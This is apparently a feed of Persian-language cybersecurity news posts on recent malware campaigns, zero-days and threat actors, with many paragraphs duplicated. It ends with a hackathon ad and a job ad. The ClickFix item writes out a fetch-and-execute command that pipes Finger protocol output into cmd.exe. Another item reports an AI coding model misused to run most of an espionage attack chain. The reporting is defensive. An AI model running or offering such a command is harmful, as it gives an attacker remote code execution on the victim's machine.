شرکت ایتالیایی Memento Labs که از بقایای Hacking Team شکل گرفته، در حملهای پیشرفته موسوم به ForumTroll نقش داشته است. این حمله با بهرهگیری از یک zero day در کروم، نهادهای روسی را هدف قرار داد و از لینکهای فیشینگ هوشمند برای آلودهسازی قربانیان استفاده کرد.
بدافزار چندمرحلهای این عملیات شامل بارگذار و جاسوسافزاری به نام LeetAgent بود که توان سرقت داده و کنترل کامل سیستم را داشت. در برخی موارد، جاسوسافزار Dante نیز نصب میشد؛ شباهت فنی آن به محصولات Hacking Team نقش Memento Labs را در این زنجیره حمله تقویت میکند.
بدافزار چندمرحلهای این عملیات شامل بارگذار و جاسوسافزاری به نام LeetAgent بود که توان سرقت داده و کنترل کامل سیستم را داشت. در برخی موارد، جاسوسافزار Dante نیز نصب میشد؛ شباهت فنی آن به محصولات Hacking Team نقش Memento Labs را در این زنجیره حمله تقویت میکند.
چندین بستهی مخرب در مخزن npm با نامهایی بسیار شبیه به کتابخانههای معتبر منتشر شدهاند تا توسعهدهندگان را فریب داده و بدافزار پیچیدهای را روی سیستمهای Windows، Linux و macOS نصب کنند. این بدافزار پس از نصب، با اجرای چندین مرحله رمزگذاری و نمایش یک CAPTCHA جعلی در ترمینال برای پنهانسازی رفتار خود، به ذخیرهسازهای کلید سیستمعاملها مانند Credential Manager، Keychain و libsecret دسترسی پیدا میکند. سپس اطلاعات حساسی همچون کلیدهای SSH، توکنهای احراز هویت، رمزهای مرورگرها و فایلهای حساس پروژهها را جمعآوری کرده و به سرور کنترل مهاجمان ارسال میکند. استفاده از این بستهها میتواند زنجیرهی تأمین نرمافزار را به خطر اندازد، چراکه مهاجمان از اعتماد ذاتی جامعهی متنباز سوءاستفاده کردهاند تا با تغییر جزئی در نام یا نسخه، بدافزار خود را در میان کتابخانههای پرکاربرد پنهان کنند. این رخداد بار دیگر اهمیت بررسی دقیق منبع بستهها، امضای دیجیتال و مدیریت سختگیرانه وابستگیها در پروژههای توسعه نرمافزار را یادآوری میکند.
هکرهای چینی با سوءاستفاده از یک zero day خطرناک در نرمافزار Lanscope Endpoint Manager موفق شدند کنترل کامل سیستمهای هدف را در دست بگیرند. این نقص امنیتی که با شناسه CVE-2025-61932 شناسایی شده، به مهاجمان اجازه میداد با دسترسی سطح SYSTEM بدافزار قدرتمندی به نام Gokcpdoor را نصب کنند؛ ابزاری با قابلیت کنترل از راه دور، سرقت داده و برقراری چند مسیر ارتباطی برای فرار از شناسایی. شرکت ژاپنی Motex که سازنده Lanscope است، در تاریخ ۲۰ اکتبر وصلهی امنیتی را منتشر کرد، اما تا آن زمان این آسیبپذیری بهصورت فعال مورد سوءاستفاده قرار گرفته بود. کارشناسان هشدار دادهاند که تنها راه امن، بهروزرسانی فوری نرمافزار است، چرا که هیچ روش موقتی برای جلوگیری از این حمله وجود ندارد — نمونهای دیگر از نبرد بیپایان میان بهروزرسانی و بهرهبرداری در دنیای سایبری.
در اولین روزهای محاسبات، نمونههای «خودتکثیر» که امروز بهعنوان نخستین بدافزارها از آنها یاد میشود، معمولاً پروژههای کوچک پژوهشی بودند: قطعات نرمافزاری نسبتاً کمحجم نوشتهشده با زبانهای مانند اسمبلی، که اغلب توسط یک یا دو نفر در چند هفته تا چند ماه توسعه مییافتند و هدفِ اصلیشان اثبات یک ایده یا رفتار بود، نه خلق ابزار خرابکارانه. نمونههای دهههای ۱۹۸۰ و ۱۹۹۰ معمولاً یک یا چند فایل منبع و چند هزار خط کد بیشتر نداشتند، در حالی در دسترسبودن روشهای بازاستفاده و بستهبندی چندشکل (polymorphic packers) بعدها به افزایش سریع و تنوع نمونهها انجامید.
تحلیلهای نشان میدهند تولید بدافزار از مرحلهٔ تکنفره و کوچک به فرآیندی صنعتی تبدیل شده است: اندازهٔ کد، تعداد فایلها و تنوع زبانها در ترتیب بزرگی افزایش یافته و زمان و تلاش توسعه نیز بهطور مشهودی رشد کرده است؛ بهعبارت دیگر، آنچه زمانی «آزمایشِ فنی» یک نفره بود، امروز میتواند به یک پروژهٔ چندماهه با چند توسعهدهنده و ماژولهای جداگانه تبدیل شود، امری که ضرورت سازوکارهای دفاعی، کنترل کیفیت و چارچوبهای اخلاقی در پژوهش و توسعهٔ نرمافزار را برجسته میسازد.
تحلیلهای نشان میدهند تولید بدافزار از مرحلهٔ تکنفره و کوچک به فرآیندی صنعتی تبدیل شده است: اندازهٔ کد، تعداد فایلها و تنوع زبانها در ترتیب بزرگی افزایش یافته و زمان و تلاش توسعه نیز بهطور مشهودی رشد کرده است؛ بهعبارت دیگر، آنچه زمانی «آزمایشِ فنی» یک نفره بود، امروز میتواند به یک پروژهٔ چندماهه با چند توسعهدهنده و ماژولهای جداگانه تبدیل شود، امری که ضرورت سازوکارهای دفاعی، کنترل کیفیت و چارچوبهای اخلاقی در پژوهش و توسعهٔ نرمافزار را برجسته میسازد.
بدافزار تازهای به نام SesameOp توسط محققان مایکروسافت شناسایی شده که با روشی خلاقانه و خطرناک، از OpenAI Assistants API بهعنوان کانال فرمان و کنترل (C2) استفاده میکند. این بدافزار با سوءاستفاده از زیرساخت قانونی سرویسهای هوش مصنوعی، فرمانهای رمزگذاریشده خود را در قالب درخواستهای کاملاً مشروع به API ارسال کرده و پاسخها را بهعنوان دستورالعمل اجرایی دریافت میکند؛ روشی که باعث میشود ترافیک آن برای سیستمهای امنیتی تقریباً غیرقابل تشخیص باشد.
تحلیلها نشان میدهد این تکنیک نوآورانه نشانهی مرحلهی جدیدی در تکامل بدافزارهاست، جایی که مهاجمان از پلتفرمهای معتبر برای پنهانسازی ارتباطات مخرب استفاده میکنند. کارشناسان امنیتی هشدار دادهاند که چنین سوءاستفادههایی میتواند باعث «مشروعنمایی حملات» شود و مقابله با آن مستلزم نظارت هوشمندانهتر بر ترافیک ابری و بهروزرسانی سیاستهای دفاعی سازمانها در برابر تهدیدات مبتنی بر هوش مصنوعی است.
تحلیلها نشان میدهد این تکنیک نوآورانه نشانهی مرحلهی جدیدی در تکامل بدافزارهاست، جایی که مهاجمان از پلتفرمهای معتبر برای پنهانسازی ارتباطات مخرب استفاده میکنند. کارشناسان امنیتی هشدار دادهاند که چنین سوءاستفادههایی میتواند باعث «مشروعنمایی حملات» شود و مقابله با آن مستلزم نظارت هوشمندانهتر بر ترافیک ابری و بهروزرسانی سیاستهای دفاعی سازمانها در برابر تهدیدات مبتنی بر هوش مصنوعی است.
👏2
هکرها در موجی از حملات هدفمند از ابزارهای مشروع Remote Monitoring and Management (RMM) برای نفوذ به شرکتهای حملونقل و کارگزاران بار استفاده کردهاند: با ارسال ایمیلها و لینکهای فیشینگ که قربانی را به نصب بستههای اجرایی جعلی میکشاند، مهاجمان RMM را روی سیستمهای کارمندان نصب و از راه دور کنترل کامیونها، تغییر مسیر محمولهها و سرقت فیزیکی بار را انجام میدهند — روشی که بهخاطر ماهیت «قابلاعتماد» این ابزارها، کشف و ردیابی را دشوار میکند.
آسیبپذیری این حملات تنها به یک کشور محدود نیست؛ نمونههایی در آمریکای شمالی، امریکای لاتین، اروپا و آسیا مشاهده شده و ابزارهایی نظیر ScreenConnect، SimpleHelp، PDQ Connect و LogMeIn Resolve در گزارشها نام برده شدهاند.
پیام کلیدی برای شرکتهای لجستیکی این است که «مجوز و قابلیت نصب RMM» باید محدود و تحت سختترین کنترلها قرار گیرد: جداسازی شبکههای OT/IT، اجرای احراز هویت چندعاملی، محدود کردن نصب نرمافزار به ایستگاههای کاری مجاز، و نظارت مستمر بر رفتار RMM و تغییرات در سیستمهای زمانبندی محموله از ضروریات دفاعیاند.
آسیبپذیری این حملات تنها به یک کشور محدود نیست؛ نمونههایی در آمریکای شمالی، امریکای لاتین، اروپا و آسیا مشاهده شده و ابزارهایی نظیر ScreenConnect، SimpleHelp، PDQ Connect و LogMeIn Resolve در گزارشها نام برده شدهاند.
پیام کلیدی برای شرکتهای لجستیکی این است که «مجوز و قابلیت نصب RMM» باید محدود و تحت سختترین کنترلها قرار گیرد: جداسازی شبکههای OT/IT، اجرای احراز هویت چندعاملی، محدود کردن نصب نرمافزار به ایستگاههای کاری مجاز، و نظارت مستمر بر رفتار RMM و تغییرات در سیستمهای زمانبندی محموله از ضروریات دفاعیاند.
❤2
گوگل هشدار داد: بدافزارهای مجهز به هوش مصنوعی وارد میدان شدند
واحد Google Threat Intelligence Group از ظهور خانوادههای جدیدی از بدافزارها خبر داده است که از مدلهای زبانی بزرگ (LLM) برای تغییر رفتار و تولید کد بهصورت لحظهای استفاده میکنند. این بدافزارها – از جمله PromptFlux، QuietVault و PromptLock – با بهرهگیری از الگوریتمهای هوش مصنوعی قادرند اسکریپتهای جدید بنویسند، خود را بازتولید کنند و از شناسایی ابزارهای امنیتی فرار کنند.
گوگل میگوید برخی از این نمونهها حتی با پلتفرمهایی مانند Gemini در ارتباطاند و از قابلیتهای مولد برای ساخت کدهای مخرب یا رمزگذاری دادهها بهره میبرند. این پدیده نشان میدهد که مرز میان ابزارهای هوشمند و تهدیدات سایبری به سرعت در حال محو شدن است؛ مهاجمان اکنون میتوانند از همان فناوریهایی استفاده کنند که برای دفاع در برابرشان طراحی شده بود.
کارشناسان امنیتی تأکید میکنند که مقابله با این نسل از تهدیدات مستلزم نظارت هوشمندتر، تحلیل رفتاری مبتنی بر هوش مصنوعی و بهروزرسانی مستمر مدلهای تشخیص است، چرا که نبرد آیندهی امنیت سایبری، نه میان انسانها بلکه میان هوشها خواهد بود.
واحد Google Threat Intelligence Group از ظهور خانوادههای جدیدی از بدافزارها خبر داده است که از مدلهای زبانی بزرگ (LLM) برای تغییر رفتار و تولید کد بهصورت لحظهای استفاده میکنند. این بدافزارها – از جمله PromptFlux، QuietVault و PromptLock – با بهرهگیری از الگوریتمهای هوش مصنوعی قادرند اسکریپتهای جدید بنویسند، خود را بازتولید کنند و از شناسایی ابزارهای امنیتی فرار کنند.
گوگل میگوید برخی از این نمونهها حتی با پلتفرمهایی مانند Gemini در ارتباطاند و از قابلیتهای مولد برای ساخت کدهای مخرب یا رمزگذاری دادهها بهره میبرند. این پدیده نشان میدهد که مرز میان ابزارهای هوشمند و تهدیدات سایبری به سرعت در حال محو شدن است؛ مهاجمان اکنون میتوانند از همان فناوریهایی استفاده کنند که برای دفاع در برابرشان طراحی شده بود.
کارشناسان امنیتی تأکید میکنند که مقابله با این نسل از تهدیدات مستلزم نظارت هوشمندتر، تحلیل رفتاری مبتنی بر هوش مصنوعی و بهروزرسانی مستمر مدلهای تشخیص است، چرا که نبرد آیندهی امنیت سایبری، نه میان انسانها بلکه میان هوشها خواهد بود.
پس از هفت ماه، بدافزار Gootloader با شیوهها و ترفندهای پیشرفتهتر به صحنه بازگشت. این بدافزار که یکی از پیچیدهترین ابزارهای توزیع بدافزار در دنیا محسوب میشود، با بهرهگیری از SEO poisoning و تبلیغات جعلی، کاربران را فریب میدهد تا فایلهایی را بارگیری کنند که ظاهراً اسناد قانونی یا فرمهای رسمیاند، اما در واقع حاوی اسکریپتهای مخربیاند که راه نفوذ مهاجمان را به درون شبکههای سازمانی باز میکنند.
در نسخه جدید، Gootloader از روشهایی خلاقانه برای فرار از شناسایی استفاده میکند؛ از جمله بهکارگیری فونتهای دستکاریشده برای پنهانسازی کلمات کلیدی در کد صفحات وب و ایجاد فایلهای فشردهای که بسته به ابزار استخراج، محتوایی متفاوت نمایش میدهند. این تغییرات نشان میدهد که گردانندگان این بدافزار در طراحی و اجرای حملات هوشمندانهتر از قبل عمل میکنند.
بازگشت Gootloader هشداری جدی برای سازمانها و کاربران حرفهای است: دانلود هر فایل ظاهراً بیضرر از وبسایتهای ناشناس میتواند نقطه آغاز نفوذی گسترده باشد. آگاهی سایبری، بهروزرسانی سامانههای امنیتی و رصد دقیق ترافیک شبکه دیگر یک انتخاب نیست، بلکه ضرورتی حیاتی است!
در نسخه جدید، Gootloader از روشهایی خلاقانه برای فرار از شناسایی استفاده میکند؛ از جمله بهکارگیری فونتهای دستکاریشده برای پنهانسازی کلمات کلیدی در کد صفحات وب و ایجاد فایلهای فشردهای که بسته به ابزار استخراج، محتوایی متفاوت نمایش میدهند. این تغییرات نشان میدهد که گردانندگان این بدافزار در طراحی و اجرای حملات هوشمندانهتر از قبل عمل میکنند.
بازگشت Gootloader هشداری جدی برای سازمانها و کاربران حرفهای است: دانلود هر فایل ظاهراً بیضرر از وبسایتهای ناشناس میتواند نقطه آغاز نفوذی گسترده باشد. آگاهی سایبری، بهروزرسانی سامانههای امنیتی و رصد دقیق ترافیک شبکه دیگر یک انتخاب نیست، بلکه ضرورتی حیاتی است!
جاسوسافزار جدید LandFall؛ حملهای خاموش از دل واتساپ به گوشیهای سامسونگ
بدافزار پیشرفتهای به نام LandFall با سوءاستفاده از یک zero-day در گوشیهای Samsung Galaxy موفق شد دستگاههای مدلهای جدید از جمله سری S22 تا S24 و Z Fold / Flip 4 را بدون نیاز به هیچ اقدامی از سوی کاربر آلوده کند. مهاجمان تنها با ارسال تصویری آلوده در واتساپ، از ضعف امنیتی در پردازش فایلهای تصویری DNG بهره میبردند تا کنترل کامل گوشی را در دست بگیرند.
پس از نفوذ، LandFall به قابلیتهای پیشرفتهای مانند ضبط صدا، دسترسی به پیامها و تماسها، سرقت موقعیت مکانی، تصاویر و فایلهای ذخیرهشده مجهز است — در واقع، یک مرکز جاسوسی کامل در جیب قربانی. سامسونگ با انتشار بهروزرسانی امنیتی در آوریل ۲۰۲۵ این نقص را برطرف کرد، اما حملات ماهها پیش از آن در جریان بوده است.
کاربران دستگاههای گلکسی باید فوراً سیستم خود را بهروزرسانی کرده و از نصب فایلها یا تصاویر ناشناس در پیامرسانها خودداری کنند — چراکه در دنیای امروز، حتی یک تصویر ساده میتواند دروازهای برای نفوذی پیچیده باشد.
بدافزار پیشرفتهای به نام LandFall با سوءاستفاده از یک zero-day در گوشیهای Samsung Galaxy موفق شد دستگاههای مدلهای جدید از جمله سری S22 تا S24 و Z Fold / Flip 4 را بدون نیاز به هیچ اقدامی از سوی کاربر آلوده کند. مهاجمان تنها با ارسال تصویری آلوده در واتساپ، از ضعف امنیتی در پردازش فایلهای تصویری DNG بهره میبردند تا کنترل کامل گوشی را در دست بگیرند.
پس از نفوذ، LandFall به قابلیتهای پیشرفتهای مانند ضبط صدا، دسترسی به پیامها و تماسها، سرقت موقعیت مکانی، تصاویر و فایلهای ذخیرهشده مجهز است — در واقع، یک مرکز جاسوسی کامل در جیب قربانی. سامسونگ با انتشار بهروزرسانی امنیتی در آوریل ۲۰۲۵ این نقص را برطرف کرد، اما حملات ماهها پیش از آن در جریان بوده است.
کاربران دستگاههای گلکسی باید فوراً سیستم خود را بهروزرسانی کرده و از نصب فایلها یا تصاویر ناشناس در پیامرسانها خودداری کنند — چراکه در دنیای امروز، حتی یک تصویر ساده میتواند دروازهای برای نفوذی پیچیده باشد.
❤3👍2
افشای آسیبپذیریهای بحرانی در runC؛ تهدیدی جدی برای زیرساختهای مبتنی بر Docker و Kubernetes
اخیراْ سه آسیبپذیری با سطح شدت بالا در ابزار runC شناسایی شده است؛ مولفهای کلیدی که بهعنوان موتور اجرای کانتینر در زیرساختهای Docker، Kubernetes و Podman مورد استفاده قرار میگیرد. این آسیبپذیریها با شناسههای CVE-2025-31133، CVE-2025-52565 و CVE-2025-52881 میتوانند به مهاجمان اجازه دهند از محیط ایزوله کانتینر خارج شده و به سطح سیستم میزبان (Host) با دسترسی Root نفوذ کنند — رخدادی که امنیت کل زنجیرهی کانتینری را به خطر میاندازد.
کارشناسان امنیتی هشدار دادهاند که این نقصها در صورت اجرای کانتینرهای دارای پیکربندی Mount خاص یا استفاده از Dockerfileهای آلوده، قابل بهرهبرداری هستند. گرچه تاکنون شواهدی از سوءاستفاده فعال گزارش نشده است، اما با توجه به اهمیت گستردهی runC در زیرساختهای ابری و DevOps، اعمال بهروزرسانی فوری حیاتی است توصیه میشود مدیران سامانهها نسخهی runC را حداقل به 1.2.8، 1.3.3 یا 1.4.0-rc3 ارتقا دهند و در صورت امکان از user namespaces و rootless containers برای کاهش سطح دسترسی بهره ببرند.
اخیراْ سه آسیبپذیری با سطح شدت بالا در ابزار runC شناسایی شده است؛ مولفهای کلیدی که بهعنوان موتور اجرای کانتینر در زیرساختهای Docker، Kubernetes و Podman مورد استفاده قرار میگیرد. این آسیبپذیریها با شناسههای CVE-2025-31133، CVE-2025-52565 و CVE-2025-52881 میتوانند به مهاجمان اجازه دهند از محیط ایزوله کانتینر خارج شده و به سطح سیستم میزبان (Host) با دسترسی Root نفوذ کنند — رخدادی که امنیت کل زنجیرهی کانتینری را به خطر میاندازد.
کارشناسان امنیتی هشدار دادهاند که این نقصها در صورت اجرای کانتینرهای دارای پیکربندی Mount خاص یا استفاده از Dockerfileهای آلوده، قابل بهرهبرداری هستند. گرچه تاکنون شواهدی از سوءاستفاده فعال گزارش نشده است، اما با توجه به اهمیت گستردهی runC در زیرساختهای ابری و DevOps، اعمال بهروزرسانی فوری حیاتی است توصیه میشود مدیران سامانهها نسخهی runC را حداقل به 1.2.8، 1.3.3 یا 1.4.0-rc3 ارتقا دهند و در صورت امکان از user namespaces و rootless containers برای کاهش سطح دسترسی بهره ببرند.
بازگشت APT37؛ سوءاستفاده از سرویس Google Find My Device برای پاکسازی تلفنهای اندرویدی
گروه APT37، وابسته به کره شمالی، در جدیدترین کارزار خود از قابلیتهای مدیریتی Google Find My Device (Find Hub) برای حذف دادههای کاربران اندروید بهره برده است. مهاجمان با اجرای حملات فیشینگ دقیق و انتشار بدافزار از طریق پیامرسان KakaoTalk، اطلاعات ورود به حسابهای گوگل قربانیان را سرقت کرده و سپس با دسترسی به این سرویس، دستگاهها را از راه دور ردیابی، قفل و در نهایت بهصورت کامل پاکسازی (Factory Reset) کردهاند، بدون آنکه کاربر فرصت واکنش داشته باشد.
زنجیرهی حمله معمولاً با پیامهایی فریبنده آغاز میشود که از سوی نهادهایی مانند پلیس یا سازمان مالیات ارسال شدهاند. بدافزار پس از نفوذ، کنترل حساب گوگل کاربر را در اختیار گرفته و با استفاده از Find Hub تمام دادههای ذخیرهشده را حذف میکند. در برخی موارد، از همان حساب آلوده برای انتشار بیشتر بدافزار به مخاطبان کاربر نیز استفاده شده است، چرخهای هوشمندانه که در سکوت کامل عمل میکند.
همین حالا احراز هویت دومرحلهای را فعال کنید و مراقب لینکها و پیامهای ناشناس باشید!
گروه APT37، وابسته به کره شمالی، در جدیدترین کارزار خود از قابلیتهای مدیریتی Google Find My Device (Find Hub) برای حذف دادههای کاربران اندروید بهره برده است. مهاجمان با اجرای حملات فیشینگ دقیق و انتشار بدافزار از طریق پیامرسان KakaoTalk، اطلاعات ورود به حسابهای گوگل قربانیان را سرقت کرده و سپس با دسترسی به این سرویس، دستگاهها را از راه دور ردیابی، قفل و در نهایت بهصورت کامل پاکسازی (Factory Reset) کردهاند، بدون آنکه کاربر فرصت واکنش داشته باشد.
زنجیرهی حمله معمولاً با پیامهایی فریبنده آغاز میشود که از سوی نهادهایی مانند پلیس یا سازمان مالیات ارسال شدهاند. بدافزار پس از نفوذ، کنترل حساب گوگل کاربر را در اختیار گرفته و با استفاده از Find Hub تمام دادههای ذخیرهشده را حذف میکند. در برخی موارد، از همان حساب آلوده برای انتشار بیشتر بدافزار به مخاطبان کاربر نیز استفاده شده است، چرخهای هوشمندانه که در سکوت کامل عمل میکند.
همین حالا احراز هویت دومرحلهای را فعال کنید و مراقب لینکها و پیامهای ناشناس باشید!
❤1
🔥 هکاتون رایگان کوئرا و همراه اول: رقابت کن و برنده شو!
🏆 هکاتون هوشِ امن | وقتش رسیده از کدهایی که نوشتی محافظت کنی!
💥 توی این هکاتون چی منتظرته؟
👨💻آموزشهای تخصصی و چندین مرحله مسابقه جذاب در زمینهی AI Security و توانمندسازی مدلهای بزرگ زبانی.
✨ چرا باید توی این هکاتون شرکت کنی؟
🔸آموزشهای تخصصی
🔸 بیش از ۱۰۰ میلیون تومان جوایز نقدی و جوایز جذاب دیگه
🔸 گواهی رسمی همراه اول و کوئرا
🔸رقابت با حرفهایهای هوشمصنوعی
👨🏫 ثبتنام به صورت تیمهای ۳ یا ۴ نفره.
🚀 تیمهای برتر کاندیدای حضور در برنامههای توانمندسازی مرکز تحقیق و نوآوری همراه اول خواهند بود.
🔗 https://quera.org/r/mjtnd
🏆 هکاتون هوشِ امن | وقتش رسیده از کدهایی که نوشتی محافظت کنی!
💥 توی این هکاتون چی منتظرته؟
👨💻آموزشهای تخصصی و چندین مرحله مسابقه جذاب در زمینهی AI Security و توانمندسازی مدلهای بزرگ زبانی.
✨ چرا باید توی این هکاتون شرکت کنی؟
🔸آموزشهای تخصصی
🔸 بیش از ۱۰۰ میلیون تومان جوایز نقدی و جوایز جذاب دیگه
🔸 گواهی رسمی همراه اول و کوئرا
🔸رقابت با حرفهایهای هوشمصنوعی
👨🏫 ثبتنام به صورت تیمهای ۳ یا ۴ نفره.
🚀 تیمهای برتر کاندیدای حضور در برنامههای توانمندسازی مرکز تحقیق و نوآوری همراه اول خواهند بود.
🔗 https://quera.org/r/mjtnd
افزایش چشمگیر فعالیت گروه COLDRIVER
گوگل در گزارش اخیر خود اعلام کرد که گروه روسی COLDRIVER، که سالها در حوزهی جاسوسی سایبری و حملات هدفمند علیه نهادهای غربی فعالیت داشته، سه خانواده بدافزاری تازه با نامهای NOROBOT، YESROBOT و MAYBEROBOT توسعه داده و در کارزارهای اخیر خود مورد استفاده قرار داده است. این بدافزارها با هدف نفوذ به شبکههای دولتی و زیرساختهای حیاتی طراحی شدهاند و با بهرهگیری از تکنیکهایی چون DLL sideloading، اجرای اسکریپتهای مبهم PowerShell و لایههای ارتباطی چندمرحلهای، امکان شناسایی و ردیابی را بهحداقل رساندهاند. تحلیلها نشان میدهد که سرعت توسعهی این ابزارها در مقایسه با چرخههای پیشین COLDRIVER افزایش قابل توجهی یافته و بیانگر بهکارگیری مدلهای توسعهی ماژولار و خودکار در پشتصحنه است.
این روند نشان میدهد که APTها در حال صنعتیسازیِ فرآیند تولید بدافزار هستند و دفاع سنتی دیگر پاسخگو نیست. سازمانها باید فوراً اجرای اسکریپتهای ناشناخته را محدود، Application Allowlisting را فعال و لاگهای EDR را برای شناسایی فعالیتهای مشکوک مرتبط با این سه بدافزار بازبینی کنند.
گوگل در گزارش اخیر خود اعلام کرد که گروه روسی COLDRIVER، که سالها در حوزهی جاسوسی سایبری و حملات هدفمند علیه نهادهای غربی فعالیت داشته، سه خانواده بدافزاری تازه با نامهای NOROBOT، YESROBOT و MAYBEROBOT توسعه داده و در کارزارهای اخیر خود مورد استفاده قرار داده است. این بدافزارها با هدف نفوذ به شبکههای دولتی و زیرساختهای حیاتی طراحی شدهاند و با بهرهگیری از تکنیکهایی چون DLL sideloading، اجرای اسکریپتهای مبهم PowerShell و لایههای ارتباطی چندمرحلهای، امکان شناسایی و ردیابی را بهحداقل رساندهاند. تحلیلها نشان میدهد که سرعت توسعهی این ابزارها در مقایسه با چرخههای پیشین COLDRIVER افزایش قابل توجهی یافته و بیانگر بهکارگیری مدلهای توسعهی ماژولار و خودکار در پشتصحنه است.
این روند نشان میدهد که APTها در حال صنعتیسازیِ فرآیند تولید بدافزار هستند و دفاع سنتی دیگر پاسخگو نیست. سازمانها باید فوراً اجرای اسکریپتهای ناشناخته را محدود، Application Allowlisting را فعال و لاگهای EDR را برای شناسایی فعالیتهای مشکوک مرتبط با این سه بدافزار بازبینی کنند.
خودکارسازی حملات سایبری توسط AI واقعیت یا اغراق؟
شرکت Anthropic اعلام کرد: یکی از مدلهای AI آن، موسوم به Claude Code, در یک عملیات جاسوسی سایبری مرتبط با چین مورد سواستفاده قرار گرفته و طبق ارزیابی داخلی شرکت، حدود ۹۰٪ زنجیره حمله بدون دخالت مستقیم مهاجمان انجام شد. این عملیات شامل مراحل جمعآوری اطلاعات هدف، تحلیل آسیبپذیریها، تولید اسکریپتهای حمله و اجرای برخی فعالیتهای نفوذی بوده و Anthropic آن را نشانهای از گذار گروههای دولتی از «کمکگیری از AI» به «اتکای عملیاتی به AI» توصیف کرده است.
با این حال، جامعهی امنیت سایبری این ادعا را با دیدهٔ تردید مینگرد. پژوهشگران اشاره میکنند که Anthropic تاکنون هیچ شواهد فنی قابلاعتنا مانند IOCها، نمونههای اسکریپت، ثبت وقایع یا دادههای رفتارشناسی ارائه نکرده و بخش زیادی از عملیات ادعاشده میتواند با ابزارهای رایج امنیتی و اتوماسیون سنتی نیز بازتولید شود. تحلیلگران تأکید دارند تا زمانی که شواهد منتشر نشود، نسبتدادن چنین توانمندی سطح بالا به مدلهای زبانی، بیش از آنکه نشاندهنده جهش واقعی در قابلیتهای خصمانهی AI باشد، بیانگر پیچیدگی تحلیل وقایع در عصر AI است.
شرکت Anthropic اعلام کرد: یکی از مدلهای AI آن، موسوم به Claude Code, در یک عملیات جاسوسی سایبری مرتبط با چین مورد سواستفاده قرار گرفته و طبق ارزیابی داخلی شرکت، حدود ۹۰٪ زنجیره حمله بدون دخالت مستقیم مهاجمان انجام شد. این عملیات شامل مراحل جمعآوری اطلاعات هدف، تحلیل آسیبپذیریها، تولید اسکریپتهای حمله و اجرای برخی فعالیتهای نفوذی بوده و Anthropic آن را نشانهای از گذار گروههای دولتی از «کمکگیری از AI» به «اتکای عملیاتی به AI» توصیف کرده است.
با این حال، جامعهی امنیت سایبری این ادعا را با دیدهٔ تردید مینگرد. پژوهشگران اشاره میکنند که Anthropic تاکنون هیچ شواهد فنی قابلاعتنا مانند IOCها، نمونههای اسکریپت، ثبت وقایع یا دادههای رفتارشناسی ارائه نکرده و بخش زیادی از عملیات ادعاشده میتواند با ابزارهای رایج امنیتی و اتوماسیون سنتی نیز بازتولید شود. تحلیلگران تأکید دارند تا زمانی که شواهد منتشر نشود، نسبتدادن چنین توانمندی سطح بالا به مدلهای زبانی، بیش از آنکه نشاندهنده جهش واقعی در قابلیتهای خصمانهی AI باشد، بیانگر پیچیدگی تحلیل وقایع در عصر AI است.
در یک کارزار بدافزاری، مهاجمان از پروتکل Finger که دههها پیش برای دریافت اطلاعات کاربران در سیستمهای یونیکس طراحی شده بود، بهعنوان یک بردار حمله سوءاستفاده میکنند. در این روش، قربانی با مهندسی اجتماعی تشویق میشود دستوری مانند finger user@domain | cmd را در خط فرمان اجرا کند. این دستور، خروجی دریافتی از سرور مهاجم را مستقیماً به cmd.exe منتقل کرده و امکان اجرای کد از راه دور را بدون نیاز به دانلود مستقیم فایل فراهم میکند. این تکنیک در برخی نسخهها به دانلود بدافزارهای Python-based و در نسخههای دیگر به اجرای NetSupport Manager RAT منجر میشود.
بدافزار ClickFix پیش از اجرا، وجود ابزارهای تحلیل مانند Wireshark، IDA یا Process Hacker را بررسی میکند تا در صورت شناسایی محیط بررسیشده، فعالیت خود را متوقف کند. پس از آلودهسازی نیز یک Scheduled Task در سیستم ایجاد میشود تا اجرای RAT در هر بار ورود کاربر تضمین شود. استفاده از پروتکل Finger و پورت 79/TCP در محیطهای مدرن امری غیرمعمول است، پس مشاهده ترافیک مربوطه میتواند نشانهای قوی از یک فعالیت مخرب باشد. توصیه میشود پورت 79 را مسدود کنید.
بدافزار ClickFix پیش از اجرا، وجود ابزارهای تحلیل مانند Wireshark، IDA یا Process Hacker را بررسی میکند تا در صورت شناسایی محیط بررسیشده، فعالیت خود را متوقف کند. پس از آلودهسازی نیز یک Scheduled Task در سیستم ایجاد میشود تا اجرای RAT در هر بار ورود کاربر تضمین شود. استفاده از پروتکل Finger و پورت 79/TCP در محیطهای مدرن امری غیرمعمول است، پس مشاهده ترافیک مربوطه میتواند نشانهای قوی از یک فعالیت مخرب باشد. توصیه میشود پورت 79 را مسدود کنید.
در دنیای تحلیل بدافزار، انتخاب ابزار مناسب میتواند تفاوت میان یک تحلیل سطحی و یک ارزیابی دقیق و قابل اتکا باشد. Hybrid Analysis در مقایسه با VirusTotal برای بسیاری از تحلیلگران امنیتی گزینهای حرفهایتر به شمار میرود، زیرا رویکرد آن فراتر از اسکن سادهی آنتیویروسهاست. این پلتفرم با اجرای نمونه در یک محیط ایزوله، رفتار واقعی فایل—از ایجاد پردازههای مشکوک گرفته تا تلاش برای ارتباط با سرورهای ناشناس—را با دقت بررسی میکند. بهرهگیری از تحلیلهای عمیق رفتاری، نتایج ساختارمند و شفافسازی مبتنی بر چارچوبهای معتبری همچون MITRE ATT&CK، امکان تصمیمگیری هوشمندانهتر و کاهش خطاهای تحلیلی را فراهم میسازد.
همچنین برخلاف VirusTotal که در برخی موارد بلافاصله پس از بارگذاری، نمونه را در اختیار طیف گستردهای از موتورهای امنیتی قرار میدهد، Hybrid Analysis کنترل کاملتری بر سطح اشتراکگذاری نمونهها ارائه میکند. این قابلیت برای سازمانهایی که با بدافزارهای حساس، پروژههای تحقیقاتی اختصاصی یا دادههای طبقهبندیشده کار میکنند، از منظر حفظ محرمانگی و مدیریت انتشار اهمیتی حیاتی دارد.
همچنین برخلاف VirusTotal که در برخی موارد بلافاصله پس از بارگذاری، نمونه را در اختیار طیف گستردهای از موتورهای امنیتی قرار میدهد، Hybrid Analysis کنترل کاملتری بر سطح اشتراکگذاری نمونهها ارائه میکند. این قابلیت برای سازمانهایی که با بدافزارهای حساس، پروژههای تحقیقاتی اختصاصی یا دادههای طبقهبندیشده کار میکنند، از منظر حفظ محرمانگی و مدیریت انتشار اهمیتی حیاتی دارد.
❤1
یک مرکز دولتی در تهران در نظر دارد از بین داوطلبین مرد متخصص در حوزه SOC سطح 1، 2 و 3 با شرایط ذیل اقدام به جذب نیرو به صورت پروژه ای نماید :
نیازمندیهای نیروی سطح 1:
1️⃣متولدین دهه هفتاد به بعد با حداقل شش ماه سابقه کار
2️⃣ دارای کارت پایان خدمت
3️⃣حداقل مدرک لیسانس در رشته های مرتبط
